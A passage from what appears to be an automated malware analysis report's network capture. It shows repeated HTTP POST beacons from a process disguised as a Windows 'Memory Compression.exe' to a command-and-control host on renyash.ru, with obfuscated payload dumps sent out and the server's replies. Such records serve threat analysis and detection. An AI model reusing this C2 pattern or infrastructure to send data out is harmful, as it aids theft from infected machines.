                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UX%2FcVhaP9892u4kYYw0d6EhXjfrHHWzkX6QnWXM8AYjcRTl4k15QpNm43YqhoJinnCVTFQ4u0qBt98FcM%2BVBzYDLdVWN29U5OH1df0ApxgXGl0MNJ49BrNxPggBtIDmdyxBhs91Q"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572e70f044201-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=8225&min_rtt=1635&rtt_var=13793&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=26860&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                47192.168.2.550019104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:12.257616997 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:12.611260891 CET1060OUTData Raw: 5f 51 5d 5b 5f 5a 5d 54 5c 5f 50 57 54 5d 59 5f 59 57 5b 58 57 5f 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _Q][_Z]T\_PWT]Y_YW[XW_T[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!2\(2+460%?:5=]$V4:%'?!<#_!$+S>;.^''P*
                                                                                                                                Jan 11, 2025 15:03:12.702115059 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:12.947194099 CET805INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zTOIoXaNSZ2TfXt77FNcZC1M1jZOFBtuIZP%2Bw8fGZIdof288%2FxymGNVf4ScQ58VLEP%2FKFANEPn%2FBo9xrFJdn5ll4bg7hUvZYWSDyfSghN%2F1bYcYf91r5etKY6ZrFQE8a0RbyFXyf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572ec283132e4-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2128&min_rtt=2005&rtt_var=999&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=487316&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                48192.168.2.550024104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:13.073246002 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:13.424109936 CET1060OUTData Raw: 5f 57 5d 5c 5f 5c 58 57 5c 5f 50 57 54 52 59 5a 59 5d 5b 50 57 52 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _W]\_\XW\_PWTRYZY][PWRT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X2/>2# !$%)_"*? )'Y!?;6Q;V*.^''P*
                                                                                                                                Jan 11, 2025 15:03:13.557254076 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:13.718993902 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:13 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xWQq8euRJiYbYN1UASSyfTbVrabIq%2BZRbETWyibEizD7j9YHHpsFqGX2DzlSLzi6yAMi3hcqKz1UztJ4rZn%2FCPvPwlh6GQYmKsmplQwc32%2FKY5wvfKf5IlkBOCXUwXDaRyCtz4kx"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572f17c4a43cf-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4145&min_rtt=1616&rtt_var=5665&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=66813&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                49192.168.2.550030104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:13.875721931 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:14.220700026 CET1060OUTData Raw: 5a 55 58 5a 5f 59 58 50 5c 5f 50 57 54 53 59 58 59 51 5b 5b 57 53 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZUXZ_YXP\_PWTSYXYQ[[WST[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"&00]>"7%&5/>:)\>;3!*&U%/*5 5((+.^''P*=
                                                                                                                                Jan 11, 2025 15:03:14.319219112 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:14.592813969 CET810INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2FDW4kbLkPNXmi1r1aMYv8UaS34KH%2F%2FNq2lLyJp2t7K45F3A0LxQLG91RfZdzfq4v%2Bvs%2BY5zCKaxbS3ZuvF7D%2BYcNfc4gJPRgGN59D9hUBYht19jnvFWy5tPjZf8VqNvwURtFuk%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572f63b4f1891-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=6229&min_rtt=1507&rtt_var=10010&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=37162&cwnd=171&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                50192.168.2.550032104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:14.931931019 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                51192.168.2.550033104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:15.174782038 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1776
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:15.533147097 CET1776OUTData Raw: 5a 55 5d 55 5f 5f 5d 53 5c 5f 50 57 54 52 59 52 59 51 5b 5a 57 56 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZU]U__]S\_PWTRYRYQ[ZWVTZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!Y% $^?24[ 10%_>)9[*;,P#*&$<&_!7);.^''P*
                                                                                                                                Jan 11, 2025 15:03:15.621609926 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:15.907398939 CET961INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:15 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mn2k635jN7UI%2BCJceN1VVKq8Cj2eAgutY3rRh4soaJjuR0M9%2BB7AL88nYrf1Y5dG%2Bmz8VZODrxl%2BMIgqTxNtimdNYk%2FaEs2P2NGzpoRfWjFi1RoVh%2F%2FllPuPoF2rv%2FKZv10RHzax"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572fe5c900f84-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2210&min_rtt=1463&rtt_var=2044&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2086&delivery_rate=196104&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 39 38 0d 0a 09 1f 27 14 35 58 39 0e 36 5d 35 0f 28 31 01 11 33 0e 04 01 29 54 36 10 26 15 34 59 2d 06 37 0a 22 2a 0a 1e 27 2d 22 06 30 00 26 13 3c 01 2c 5d 00 10 23 43 30 0d 2d 5b 2d 22 08 0c 29 0f 0a 43 23 12 09 5b 24 2b 31 09 22 33 0e 05 20 5b 26 05 2e 32 20 09 2e 0a 08 5a 2d 01 2f 03 37 35 2b 55 00 14 20 57 27 29 33 02 3e 33 27 0e 22 38 2d 01 25 28 2c 57 2a 02 0e 1e 2a 16 3e 0d 28 02 25 09 20 01 3e 00 28 23 2f 19 24 31 21 15 25 3c 21 5f 23 0d 2e 54 0d 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 98'5X96]5(13)T6&4Y-7"*'-"0&<,]#C0-[-")C#[$+1"3 [&.2 .Z-/75+U W')3>3'"8-%(,W**>(% >(#/$1!%<!_#.T?WT0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                52192.168.2.550034104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:15.316293955 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:15.673856974 CET1060OUTData Raw: 5a 54 58 5f 5a 5c 58 54 5c 5f 50 57 54 54 59 53 59 5c 5b 58 57 54 54 59 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZTX_Z\XT\_PWTTYSY\[XWTTY[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^"2 <<413,==\=<V4:&S'Y.U(&#" (;.^''P*!
                                                                                                                                Jan 11, 2025 15:03:15.778372049 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:16.018063068 CET802INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:15 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6lNPkdogqtluH8uMTwFqnWQzhDaKff271nifVoXaRUtNRWWskOfkjmn9PevaCOL57fPCVbOcgh39BUpfpq9%2F6YdOTsHRElt%2F4y%2FUJRiBtSa7mxGWxZQIvp4GPggPaHq4LmkETkQ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900572ff5d3ff5f6-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=7927&min_rtt=1522&rtt_var=13381&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=27669&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                53192.168.2.550035104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:16.146964073 CET286OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Jan 11, 2025 15:03:16.501868963 CET1060OUTData Raw: 5f 56 58 59 5f 58 5d 54 5c 5f 50 57 54 5c 59 58 59 53 5b 5b 57 57 54 5d 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: _VXY_X]T\_PWT\YXYS[[WWT][Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!24^<"$] 1_$(**&> U4**'?2T+5#!'U).^''P*
                                                                                                                                Jan 11, 2025 15:03:16.619211912 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:16.874572039 CET801INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:16 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=00uLtqkQxPXmOhpB53%2ByndDiLqOOY6Q79tCY4Aha7JNm4o%2Fwl8EOTZBVk7RjLK2JWIDMFGZJ1NR8B7TIQ9VvOTQ8MBef4DcJiArPv6jVgwlHFxs2%2FmL2yjNitxOVPAYvglWPxHRj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 900573049b816a5e-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=4956&min_rtt=1793&rtt_var=6999&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=53872&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                54192.168.2.550036104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:17.037081957 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:17.427747965 CET1060OUTData Raw: 5a 55 58 5f 5a 5b 58 5d 5c 5f 50 57 54 52 59 5c 59 5c 5b 5c 57 56 54 5b 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZUX_Z[X]\_PWTRY\Y\[\WVT[[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!X20/?1872>&5]=1\>;W7:"T0/&<<"7'S).^''P*
                                                                                                                                Jan 11, 2025 15:03:17.500483036 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:17.685746908 CET796INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:17 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Q19qG6ijzon8lUijaQHTw%2FFlzJRvZARv1K5G66Q6zHeku6d8s8aHI50LCYO3HbfNx1UyuPWX2Lggg5uwps1vg%2FEqZPavG2Jf2YYZ5ewEk2V7VeucUFvcmSit9Xph58jlHVI73Cf%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005730a1f0e4390-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3845&min_rtt=1724&rtt_var=4889&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=78099&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a
                                                                                                                                Data Ascii: 4;W^Q
                                                                                                                                Jan 11, 2025 15:03:17.776256084 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                55192.168.2.550037104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:17.982405901 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Jan 11, 2025 15:03:18.329972982 CET1060OUTData Raw: 5a 57 5d 54 5f 5b 5d 57 5c 5f 50 57 54 50 59 5d 59 57 5b 5e 57 5e 54 5a 5b 5a 5b 5b 56 5d 56 54 5a 5f 57 5c 59 5f 5b 59 59 5f 51 55 55 5d 53 58 53 58 59 46 5a 52 5e 5a 50 53 57 51 54 50 5a 46 5e 5d 58 5f 5f 5d 58 51 5e 52 59 5a 5e 5c 5e 59 57 54
                                                                                                                                Data Ascii: ZW]T_[]W\_PWTPY]YW[^W^TZ[Z[[V]VTZ_W\Y_[YY_QUU]SXSXYFZR^ZPSWQTPZF^]X__]XQ^RYZ^\^YWTUTUAXYSZZ\[PQSSY_V[ZBZT^BS[_][YWVSFZZTQ]_WP]YW]\^XQVZHYS[W^\^ZYVW_X_TYCU_YT]WSZQ^XRR^X_VPR_S_QZ]_U\\[^!1V/<T$]76Z3,^?)>=8<V49V3?&*%76).^''P*1
                                                                                                                                Jan 11, 2025 15:03:18.437566042 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:18.676544905 CET25INHTTP/1.1 100 Continue
                                                                                                                                Jan 11, 2025 15:03:18.681149006 CET799INHTTP/1.1 200 OK
                                                                                                                                Date: Sat, 11 Jan 2025 14:03:18 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: keep-alive
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=A4iqcb5KERlYA4OYLsDRprTqzftu7SoqKl%2FVB7xDL3MsbyMmhRXiR%2B7LB3wclYqfLBLaiIdjVssziE1QBCnjtlxlKGBPuOIdNWzGUo4Bf1DQtO74hkk8ohaT3HhNmRDBGTx2tyJe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 9005730ffe074264-EWR
                                                                                                                                alt-svc: h2=":443"; ma=60
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=3409&min_rtt=1735&rtt_var=3999&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1370&delivery_rate=96509&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                Data Raw: 34 0d 0a 3b 57 5e 51 0d 0a 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 4;W^Q0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                56192.168.2.550038104.21.38.84805436C:\Program Files (x86)\Windows Mail\Memory Compression.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Jan 11, 2025 15:03:18.805427074 CET310OUTPOST /eternallowProcessDefaultLinuxWindowsflowerTrackTemp.php HTTP/1.1
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                                                                Host: 586580cm.renyash.ru
                                                                                                                                Content-Length: 1060
                                                                                                                                Expect: 100-continue
                                                                                                                                Connection: Keep-Alive
